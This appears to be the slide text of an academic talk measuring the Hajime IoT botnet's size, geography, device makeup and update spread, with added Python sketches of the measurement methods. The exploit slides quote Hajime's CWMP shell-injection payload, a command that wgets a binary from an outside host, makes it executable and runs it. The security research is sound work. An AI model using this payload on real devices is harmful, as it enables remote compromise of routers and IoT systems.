Measurement and Analysis of Hajime: a Peer-to-peer IoT Botnet
University of Maryland
Stephen Herwig Katura Harvey George Hughey Richard Roberts Dave Levin
The Max Planck Institute for Software Systems
Rise of IoT Botnets
Hajime
- Resilient C&C
- Targets many CPU architectures
- Scanning behavior is architecture-specific
- Continuously deploys new exploits
Talk Overview
Describe
- Hajime P2P network
- Our measurement infrastructure
Analyze
- Heterogeneous botnet composition
- Impact of three exploit deployments
Discuss
- Challenges of new, resilient botnets
BitTorrent’s P2P Network
Uses a DHT to track who is downloading what
- Peer hosting a file named F: announce hash(F)
- DHT node: hosting hash(F)
- Peer that wants to download F: lookup hash(F)
- The DHT provides random subsets of current uploaders
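The announce/lookup exchange can be sketched with a toy in-memory table. This is only an illustration of the idea on the slide, not BitTorrent's actual wire protocol: the class `ToyDHT`, the helper `file_key`, the subset size, and the peer addresses are all hypothetical, and hashing the file name with SHA-1 is a simplification that mirrors the slide's hash(F).

```python
import hashlib
import random
from collections import defaultdict


class ToyDHT:
    """In-memory stand-in for a DHT: maps a key to the peers that announced it."""

    def __init__(self, subset_size=3, seed=0):
        self.peers_by_key = defaultdict(set)
        self.subset_size = subset_size      # hypothetical reply size
        self.rng = random.Random(seed)

    def announce(self, key, peer):
        # A peer hosting the file registers itself under the file's key.
        self.peers_by_key[key].add(peer)

    def lookup(self, key):
        # A reply is a random subset of the current announcers, not the full list.
        peers = sorted(self.peers_by_key.get(key, ()))
        return self.rng.sample(peers, min(self.subset_size, len(peers)))


def file_key(name):
    # Simplification: hash the file name directly, as in the slide's hash(F).
    return hashlib.sha1(name.encode()).hexdigest()


all_peers = ["10.0.0.1", "10.0.0.2", "10.0.0.3", "10.0.0.4", "10.0.0.5"]
dht = ToyDHT(subset_size=3)
key = file_key("F")
for peer in all_peers:
    dht.announce(key, peer)

reply = dht.lookup(key)   # three of the five announcers, chosen at random
```

Because each reply is only a subset, a single lookup never reveals every uploader.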
Hajime’s P2P Network
① Uses BitTorrent’s DHT to find other bots
- Hosting bot: announce hash(F)
- Downloading bot: lookup hash(F)
- DHT node: hosting hash(F), returns a random subset
F combines:
- Date: once per day
- File type: .i (“infect”), .atk (“attack”)
- Architecture: MIPS little endian, MIPS big endian, ARM v5, ARM v6, ARM v7
Every day, bots are announcing their actions and their devices’ architectures
Hajime’s design is primed for measurement!
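A minimal sketch of how a per-day key could be derived from date, file type, and architecture. The slides do not give the exact name layout or hash input, so `daily_name`, its `type/arch/date` layout, and the use of SHA-1 over that string are assumptions made for illustration only.

```python
import hashlib
from datetime import date

FILE_TYPES = ("i", "atk")                                   # .i "infect", .atk "attack"
ARCHES = ("mipsel", "mipseb", "arm5", "arm6", "arm7")


def daily_name(file_type, arch, day):
    # Hypothetical layout; the slides only say the name combines these three parts.
    return f"{file_type}/{arch}/{day.isoformat()}"


def daily_key(file_type, arch, day):
    # Assumption: the DHT key is a SHA-1 digest of the name (160 bits, 40 hex chars).
    return hashlib.sha1(daily_name(file_type, arch, day).encode()).hexdigest()


def keys_for_day(day):
    # One key per (file type, architecture) pair for the given day.
    return {(t, a): daily_key(t, a, day) for t in FILE_TYPES for a in ARCHES}


today = keys_for_day(date(2018, 1, 25))
tomorrow = keys_for_day(date(2018, 1, 26))
```

Under these assumptions an observer who knows the naming scheme can precompute all ten keys for any day, which is what makes the design convenient to measure.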
Hajime’s P2P Network
② Fetch files directly from one another
- Downloading bot finds a hosting bot via lookup hash(F)
- Downloading bot and hosting bot: key exchange, then request file
Keys provide long-lived identifiers
Hajime’s P2P Network
① Uses BitTorrent’s DHT to find other bots
Difficult to take down Hajime (without also taking down BitTorrent)
② Fetch files directly from one another
Difficult to centrally monitor
Hajime is a resilient next step in IoT botnets
Measuring Hajime’s P2P network
① Exhaustively list all peers
- lookup hash(F) at the DHT nodes hosting hash(F); each reply is a random subset
- Keys looked up: i/mipseb/today, atk/arm7/today, i/mipsel/tomorrow, atk/arm5/yesterday
Every 16 minutes for 4 months
5,404,045 total IP addresses found
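One way to turn random-subset replies into an exhaustive listing is to repeat the lookup until replies stop revealing new peers. The sketch below assumes that approach; the stopping rule (`patience`), the function `enumerate_peers`, and the simulated swarm are hypothetical and are not taken from the talk.

```python
import random


def enumerate_peers(lookup, key, patience=50):
    """Call lookup(key) repeatedly; stop after `patience` consecutive
    replies that contain no previously unseen peer."""
    seen = set()
    stale = 0
    while stale < patience:
        new = set(lookup(key)) - seen
        if new:
            seen |= new
            stale = 0
        else:
            stale += 1
    return seen


# Simulated DHT node: every reply is a random subset of a 40-peer swarm.
rng = random.Random(1)
swarm = [f"192.0.2.{i}" for i in range(1, 41)]


def fake_lookup(key):
    return rng.sample(swarm, 8)


found = enumerate_peers(fake_lookup, "i/mipseb/today")
```

A larger `patience` lowers the chance of missing a peer at the cost of more lookups; the right trade-off depends on the reply size and swarm size.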
Measuring Hajime’s P2P network
② Obtain each Hajime bot’s public key
Key exchange
10,536,174 total keys found
[Figure: scatter plot of keys vs. IPs per country (Iran, Mexico, China, India, South Korea, United States, Turkey, Russia, Indonesia, Brazil), shown at two scales: up to about 120K and up to 900K]
NATs undercount bots based on IPs
IP reassignment overcounts bots based on IPs
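A small sketch of why IP counts and key counts diverge. The observations are made up: three keys seen behind one address stand in for bots sharing a NAT, and one key seen at three addresses stands in for IP reassignment. Treating each key as exactly one bot is itself an assumption of this example.

```python
from collections import defaultdict


def summarize(observations):
    """observations: iterable of (ip, key) pairs from key scans."""
    keys_by_ip = defaultdict(set)
    ips_by_key = defaultdict(set)
    for ip, key in observations:
        keys_by_ip[ip].add(key)
        ips_by_key[key].add(ip)
    return {
        "unique_ips": len(keys_by_ip),
        "unique_keys": len(ips_by_key),
        # Several keys behind one IP: counting IPs would undercount (NAT).
        "ips_with_many_keys": sum(1 for ks in keys_by_ip.values() if len(ks) > 1),
        # One key at several IPs: counting IPs would overcount (reassignment).
        "keys_with_many_ips": sum(1 for ips in ips_by_key.values() if len(ips) > 1),
    }


obs = [
    ("198.51.100.7", "keyA"), ("198.51.100.7", "keyB"), ("198.51.100.7", "keyC"),
    ("203.0.113.1", "keyD"), ("203.0.113.2", "keyD"), ("203.0.113.3", "keyD"),
]
stats = summarize(obs)
```

Here both counts come out to four, yet the IP count is wrong in two opposite directions at once, which is why neither error can be corrected from IPs alone.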
Datasets
Jan 25, 2018 – Jun 1, 2018
- DHT scans: 5,404,045 unique IP addresses
- Key scans: 10,536,174 unique keys
- Reverse engineering: 47 modules (34 .atk, 13 .i)
All available at iot.cs.umd.edu
Analysis Questions
Characteristics
- How large is the botnet?
- Where are bots located?
- What devices make up the botnet?
Dynamics
- How do exploits change the botnet?
- How quickly does Hajime update itself?
- How does Hajime deploy new exploits?
How big is Hajime?
[Figure: number of distinct bots (0K to 100K) over time (20-minute bins), 01-26 to 06-01; markers for the atk.mipseb update and the .i.mipseb update]
Steady-state of ~40K bots
Peaks of 95K after Chimay-Red and GPON exploits
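The plotted quantity, distinct bots per 20-minute bin, can be computed along these lines. This is a sketch under assumptions: the input is a list of hypothetical `(timestamp, bot_id)` sightings, and bins are aligned to the Unix epoch.

```python
from collections import defaultdict
from datetime import datetime, timedelta

BIN = timedelta(minutes=20)
EPOCH = datetime(1970, 1, 1)


def bin_start(ts):
    # Round a timestamp down to the start of its 20-minute bin.
    return EPOCH + ((ts - EPOCH) // BIN) * BIN


def distinct_per_bin(sightings):
    """sightings: iterable of (timestamp, bot_id); returns {bin_start: distinct bot count}."""
    bots = defaultdict(set)
    for ts, bot_id in sightings:
        bots[bin_start(ts)].add(bot_id)
    return {b: len(ids) for b, ids in sorted(bots.items())}


sightings = [
    (datetime(2018, 1, 26, 0, 5), "a"),
    (datetime(2018, 1, 26, 0, 15), "a"),   # same bot again, same bin
    (datetime(2018, 1, 26, 0, 19), "b"),
    (datetime(2018, 1, 26, 0, 20), "a"),   # falls in the next bin
]
counts = distinct_per_bin(sightings)
```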
Where are bots located?
[Figure: number of distinct bots (0K to 100K) over time (20-minute bins), 01-26 to 06-01, broken down by country: Brazil, Iran, Mexico, China, India, S. Korea, US, Turkey, Russia, Indonesia, Others; markers for the atk.mipseb update and the .i.mipseb update]
- Chimay-Red: Russia expanded 500 → 6,000 hourly
- GPON: mostly affected Mexico
The geographic makeup of IoT botnets can change rapidly
What CPU architectures are most infected?
[Figure: number of distinct bots (0K to 100K) over time (20-minute bins), 01-26 to 06-01, broken down by architecture: mipseb, mipsel, arm7, arm6, arm5; markers for the atk.mipseb update and the .i.mipseb update]
Devices overwhelmingly run MIPS
74.2% of bot devices are MIPS big-endian (mipseb)
How does CPU architecture vary by country?
[Figure: number of distinct bots per country, broken down by architecture (arm5, arm6, arm7, mipsel, mipseb, unknown); y-axis 0K to 600K with a break to 4M and 5M. One panel shows BR, CN, IR, IN, KR, US, TR, RU, MX, IT; the panel after the introduction of the GPON vulnerability shows BR, IR, MX, CN, IN, KR, US, TR, RU, ID]
IoT botnets are highly heterogeneous across the world
Mexico before GPON vs. after GPON: Mexico changed from primarily ARM to primarily MIPS
New vulnerabilities can lead to drastic changes in geography and composition
What devices are infected?
DHT scans + Censys
No device information on over 80% of bot IP addresses
Of those identifiable:
- 0.8% MikroTik the day before Chimay-Red
- 80.3% MikroTik the day after
How quickly does Hajime disseminate module updates?
[Figure: two panels, % of bots per .i version and % of bots per atk version (0 to 100), over time (20-minute bins), 03-15 to 05-24; % of mipseb bots hosting or looking up each file version]
- Quick
- Inconsistent
- A new .i clears old atks.
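The per-version percentages in these plots amount to a share computation within each time bin. A minimal sketch, assuming a hypothetical mapping from bot identifier to the file version that bot was last seen hosting or looking up in one bin:

```python
from collections import Counter


def version_share(version_by_bot):
    """version_by_bot: {bot_id: version} for one time bin.
    Returns {version: percent of bots on that version}."""
    counts = Counter(version_by_bot.values())
    total = sum(counts.values())
    if total == 0:
        return {}
    return {version: 100.0 * n / total for version, n in counts.items()}


# Made-up bin: one bot still on the old version, three on the new one.
one_bin = {"bot1": "v1", "bot2": "v2", "bot3": "v2", "bot4": "v2"}
share = version_share(one_bin)
```

Tracking how fast the newest version's share approaches 100 across consecutive bins gives one measure of dissemination speed.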
Hajime’s CWMP exploit
<NewNTPServer1>SHELL_INJECTION</NewNTPServer1>
cd /tmp;wget http://1.2.3.4:5678/3; chmod 777 3;./3
Attacking a non-vulnerable host
<NewNTPServer1>SHELL_INJECTION</NewNTPServer1>
cd /tmp;wget http://1.2.3.4:5678/3; chmod 777 3;./3
- Non-vulnerable host: “This is a domain name”
- Local DNS Resolver: “What’s this TLD?”
- D-root: NXDOMAIN
What we learn from D-root
[Diagram: Local DNS Resolver querying D-root]
DNS Backscatter
A sample of attack attempts worldwide
But only to non-vulnerable hosts
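The backscatter signal can be illustrated as follows: when the injected command is treated as a host name, the text after its last dot plays the role of a TLD, and that TLD does not exist. The helper names and the marker list below are hypothetical heuristics for this sketch, not the classifier used in the study.

```python
def rightmost_label(name):
    """Return the text after the last dot, which a resolver would treat as the TLD."""
    return name.rstrip(".").rsplit(".", 1)[-1]


# Hypothetical markers of a shell command that ended up in a DNS query name.
SHELL_MARKERS = (";", "wget ", "chmod ", "/tmp")


def looks_like_backscatter(qname):
    # Flag query names containing any shell-command marker.
    return any(marker in qname for marker in SHELL_MARKERS)


injected = "cd /tmp;wget http://1.2.3.4:5678/3; chmod 777 3;./3"
tld = rightmost_label(injected)          # "/3", not a real TLD
```

A legitimate NTP server name such as `pool.ntp.org` contains none of the markers and is not flagged.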
DNS Backscatter: Mirai vs. Hajime
[Figure: TR-064 injection attempts (0 to 60K) over time (20-minute bins), 11/16 to 05/18, for Mirai and Hajime; Hajime markers: config update, .i.mipseb update, atk.mipseb update, .i.mipsel update, atk.mipsel update]
Where is Hajime from?
Initial (test?) CWMP attack came from the Netherlands
Reverse engineering: 47 modules (34 .atk, 13 .i)
Hajime blacklists the same IP addresses as Mirai, plus:
- 77.247.0.0/16
- 85.159.0.0/16
- 109.201.0.0/16
These have one ISP in common: NFOrce Entertainment (located in the Netherlands)
[Figure: TR-064 injection attempts (0 to 60K) over time (20-minute bins), 11/16 to 05/18, for Mirai and Hajime, with Hajime update markers]
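Checking whether an address falls in the three extra blacklisted ranges is a plain CIDR membership test. The sketch below uses Python's standard `ipaddress` module; the function name `in_extra_blacklist` is hypothetical, and the Mirai portion of the blacklist is not reproduced because the slides do not list it.

```python
import ipaddress

# The three /16 ranges named on the slide.
EXTRA_BLACKLIST = [
    ipaddress.ip_network(cidr)
    for cidr in ("77.247.0.0/16", "85.159.0.0/16", "109.201.0.0/16")
]


def in_extra_blacklist(addr):
    # True when the address belongs to any of the extra ranges.
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in EXTRA_BLACKLIST)


skipped = in_extra_blacklist("77.247.1.2")     # inside 77.247.0.0/16
scanned = in_extra_blacklist("8.8.8.8")        # outside all three ranges
```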
Also covered in the paper
- Details on bot internals and exploits
- Analysis of bot churn
- Details on device fingerprinting
- Country-level analysis of CWMP DNS backscatter
Measuring and analyzing Hajime
DHT scans, key scans, D-root
- IoT botnets are resilient and large: 40K steady, 95K peak
- IoT botnets have highly heterogeneous architectures
- New vulnerabilities can lead to drastic changes in size, geography, and composition
Code and data coming soon: iot.cs.umd.edu